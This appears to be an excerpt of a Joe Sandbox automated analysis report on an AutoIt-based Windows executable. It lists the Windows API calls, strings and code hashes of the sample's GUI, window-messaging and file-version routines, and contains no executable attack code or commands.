                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 4105515805-45149045
                                                                              • Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                              • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                                              • Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                              • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                              • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                              • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                              • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                              • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                              • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                              • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              • Opcode ID: a06d48a2979655432857ca0a86f3a9691512fcdd8cb1bcceda99ab6dc2c25faa
                                                                              • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                              • Opcode Fuzzy Hash: a06d48a2979655432857ca0a86f3a9691512fcdd8cb1bcceda99ab6dc2c25faa
                                                                              • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                              • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                              • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                              • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                              • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                              • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                              • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                              • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                              • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                              • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                              • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                              • API String ID: 2910397461-517079104
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                              • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                              • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 0048A903
                                                                              • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                              • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                              • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                              • GetSysColor.USER32(00000011), ref: 0048A945
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                              • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                              • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                              • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                              • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                              • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                              • DeleteObject.GDI32(?), ref: 0048AA89
                                                                              • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                              • DeleteObject.GDI32(?), ref: 0048AA94
                                                                              • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                              • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                              • CharNextW.USER32(0000014E), ref: 00488B01
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                              • _memset.LIBCMT ref: 00488C44
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                              • _memset.LIBCMT ref: 00488CEC
                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                              • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 004849CA
                                                                              • GetDesktopWindow.USER32 ref: 004849DF
                                                                              • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                              • DestroyWindow.USER32(?), ref: 00484A74
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                              • IsWindowVisible.USER32(?), ref: 00484B29
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                              • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                              • CopyRect.USER32(?,?), ref: 00484BC7
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                                              • _wcscpy.LIBCMT ref: 00464500
                                                                              • _wcscmp.LIBCMT ref: 0046450B
                                                                              • _wcscat.LIBCMT ref: 00464521
                                                                              • _wcsstr.LIBCMT ref: 0046452C
                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                                              • _wcscat.LIBCMT ref: 00464591
                                                                              • _wcscat.LIBCMT ref: 00464598
                                                                              • _wcsncpy.LIBCMT ref: 004645C3
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 699586101-1459072770
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                              • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                              • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                              • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                              • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                              • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: 8230eef7603afee7a67e90df488af8036995465dfdd4a77bdf6363274e995632
                                                                              • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                                              • Opcode Fuzzy Hash: 8230eef7603afee7a67e90df488af8036995465dfdd4a77bdf6363274e995632
                                                                              • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                              • __swprintf.LIBCMT ref: 0045A51B
                                                                              • _wcscmp.LIBCMT ref: 0045A52E
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                              • _wcscmp.LIBCMT ref: 0045A5BF
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                              • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                              • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                              • GetParent.USER32(?), ref: 0045A69C
                                                                              • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                              • _wcscmp.LIBCMT ref: 0045A731
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                              • _wcscmp.LIBCMT ref: 0045A76B
                                                                                • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                              • String ID: %s%u
                                                                              • API String ID: 3744389584-679674701
                                                                              • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                              • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                                              • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                              • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                                              APIs
                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                              • _wcscmp.LIBCMT ref: 0045AF29
                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                              • _wcscmp.LIBCMT ref: 0045AF8C
                                                                              • _wcsstr.LIBCMT ref: 0045AF9D
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                              • _wcscmp.LIBCMT ref: 0045AFE5
                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                              • _wcscmp.LIBCMT ref: 0045B065
                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                              • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                              • String ID: @$ThumbnailClass
                                                                              • API String ID: 1788623398-1539354611
                                                                              • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                              • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                                              • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                              • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                              • _wcscat.LIBCMT ref: 0048C6EE
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                              • DragFinish.SHELL32(?), ref: 0048C75E
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                                              • API String ID: 169749273-3863044002
                                                                              • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
